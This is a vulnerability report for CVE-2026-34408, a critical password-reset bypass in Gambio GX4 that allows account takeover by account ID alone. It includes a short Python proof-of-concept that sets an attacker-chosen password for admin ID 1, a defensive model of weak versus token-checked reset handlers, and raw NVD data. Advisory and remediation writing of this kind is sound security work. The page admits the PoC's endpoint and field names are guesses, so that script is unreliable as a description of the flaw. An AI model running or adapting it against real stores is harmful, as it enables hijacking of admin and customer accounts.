Security Vulnerability Report
CVE-2026-34408 CVSS 9.1 CRITICAL

Published: 2026-05-05 14:16:09
Last Modified: 2026-05-06 18:16:03

Description

An issue was discovered in Gambio GX4 4.9.2.0 (fixed by the vendor's Security Update 2024-02 v1.0.0, which covers GX4 v4.0.0.0 through v4.9.2.0). The password reset function can be bypassed to set an arbitrary password on an arbitrary account when that account's ID is known, i.e. knowledge of the ID is sufficient and no proof of ownership of the account is required. The entry is classified as CWE-640 (Weak Password Recovery Mechanism for Forgotten Password). Account IDs are commonly small sequential integers, so the precondition is weak, and the outcome is a full takeover of the targeted account (C:H/I:H in the vector below) with no authentication and no user interaction.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is attached to the NVD record. The affected range below is taken from the description and from the vendor's update notice (Security Update 2024-02 v1.0.0):

Gambio GX4 >= 4.0.0.0
Gambio GX4 <= 4.9.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL and user ID. NOTE: the endpoint path and the parameter names
# below are this page's guesses; neither the usd advisory nor the Gambio
# forum post referenced here documents the request format, so they must be
# adapted to the installation being tested.
target_url = "https://example.com/password_reset.php"
user_id = "1"  # often the admin ID is 1
new_password = "HackedPassword123"

# Payload exploiting the bypass: the reset is accepted on the strength of the
# account ID alone, i.e. no reset token/hash is required or checked.
payload = {
    "user_id": user_id,
    "new_password": new_password,
    "confirm_password": new_password,
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    # A 200 only shows the endpoint answered; confirm by logging in.
    if response.status_code == 200:
        print("[+] Password reset potentially successful. Try logging in.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[-] An error occurred: {e}")
```
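The bug class behind this entry (CWE-640) is a reset handler that trusts the account ID in the request instead of a secret that was delivered to the account owner. The following is an added, runnable model of that pattern and of its fix; it is editor's example code, not Gambio's implementation and not the usd advisory's proof of concept. The in-memory user store, the field names (`user_id`, `token`, `new_password`, `confirm_password`), the 15-minute token lifetime and the PBKDF2 parameters are all assumptions chosen for the illustration.

```python
"""Weak vs. hardened password-reset handler (CWE-640), as a runnable model.

Added illustration only: neither Gambio's code nor the usd advisory's PoC.
The user store, field names and token lifetime are assumptions.
"""
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds a reset token stays valid (assumed policy)


def _hash_password(password: str, salt: bytes) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


# Constructed sample accounts; id 1 plays the administrator.
USERS = {
    1: {"salt": b"salt-1", "pw": _hash_password("original-admin-pw", b"salt-1")},
    2: {"salt": b"salt-2", "pw": _hash_password("customer-pw", b"salt-2")},
}

# Outstanding resets: user id -> (sha256 hex of the token, expiry time).
# Only the hash is stored, so a leaked table does not yield usable tokens.
_PENDING_RESETS = {}


def verify_login(user_id, password):
    user = USERS.get(user_id)
    return user is not None and hmac.compare_digest(
        user["pw"], _hash_password(password, user["salt"])
    )


def _parse_id(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def weak_reset(request):
    """The CWE-640 shape: the only thing tying the request to the account is
    the caller-supplied id, so anyone who knows an id can set its password."""
    user = USERS.get(_parse_id(request.get("user_id")))
    if user is None or request.get("new_password") != request.get("confirm_password"):
        return False
    user["pw"] = _hash_password(request["new_password"], user["salt"])
    return True


def issue_reset_token(user_id, now):
    """'Forgot password' step: mint a 256-bit token, store only its hash and
    return the raw token, which would go solely into the owner's e-mail."""
    token = secrets.token_urlsafe(32)
    _PENDING_RESETS[user_id] = (hashlib.sha256(token.encode()).hexdigest(), now + TOKEN_TTL)
    return token


def hardened_reset(request, now):
    """Same form fields, but the password changes only if the caller presents
    the unexpired, unused token that was issued for this specific account."""
    user_id = _parse_id(request.get("user_id"))
    entry = _PENDING_RESETS.get(user_id)
    if entry is None:
        return False  # no reset was requested for this account
    expected_digest, expires_at = entry
    supplied = hashlib.sha256(request.get("token", "").encode()).hexdigest()
    if not hmac.compare_digest(expected_digest, supplied):
        return False  # wrong token; rate limiting belongs in front of this
    if now > expires_at:
        del _PENDING_RESETS[user_id]
        return False  # stale token
    if request.get("new_password") != request.get("confirm_password"):
        return False
    del _PENDING_RESETS[user_id]  # single use: a captured token cannot be replayed
    user = USERS[user_id]
    user["pw"] = _hash_password(request["new_password"], user["salt"])
    return True


def demo():
    """Attacker knows only that the admin id is 1 and sends the PoC-style form."""
    attack = {"user_id": "1", "new_password": "attacker-pw", "confirm_password": "attacker-pw"}
    now = time.time()
    out = {}
    out["weak_takeover"] = weak_reset(attack) and verify_login(1, "attacker-pw")
    USERS[1]["pw"] = _hash_password("original-admin-pw", b"salt-1")  # undo for the next part
    out["hardened_no_token"] = hardened_reset(attack, now)
    token = issue_reset_token(1, now)
    out["hardened_wrong_token"] = hardened_reset({**attack, "token": "A" * 43}, now)
    out["hardened_expired"] = hardened_reset({**attack, "token": token}, now + TOKEN_TTL + 1)
    token = issue_reset_token(1, now)  # the owner requests a fresh one
    out["hardened_valid"] = hardened_reset({**attack, "token": token}, now + 60) and verify_login(1, "attacker-pw")
    out["hardened_replay"] = hardened_reset({**attack, "token": token}, now + 61)
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The point of the hardened handler is that the account ID in the request is never the authority for anything: the server looks up which account a reset was issued for, compares the presented token in constant time against a stored hash, enforces expiry, and invalidates the token on use. The weak handler accepts exactly the form the PoC above sends, which is why knowing an ID is enough there.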

References

usd HeroLab security advisory usd-2024-0002: https://herolab.usd.de/security-advisories/usd-2024-0002/
Gambio forum, vendor notice "Important Security Update 2024-02 v1.0 for GX4 v4.0.0.0 to v4.9.2.0": https://www.gambio.de/forum/threads/wichtiges-security-update-2024-02-v1-0-fuer-gx4-v4-0-0-0-bis-v4-9-2-0.50896/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34408", "sourceIdentifier": "[email protected]", "published": "2026-05-05T14:16:08.623", "lastModified": "2026-05-06T18:16:03.223", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Gambio 4.9.2.0 (patched in 2024-02 v1.0.0 for GX4 v4.0.0.0 to v4.9.2.0). The password reset function can be bypassed to set arbitrary passwords for arbitrary accounts if the ID is known."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "references": [{"url": "https://herolab.usd.de/security-advisories/usd-2024-0002/", "source": "[email protected]"}, {"url": "https://www.gambio.de/forum/threads/wichtiges-security-update-2024-02-v1-0-fuer-gx4-v4-0-0-0-bis-v4-9-2-0.50896/", "source": "[email protected]"}]}}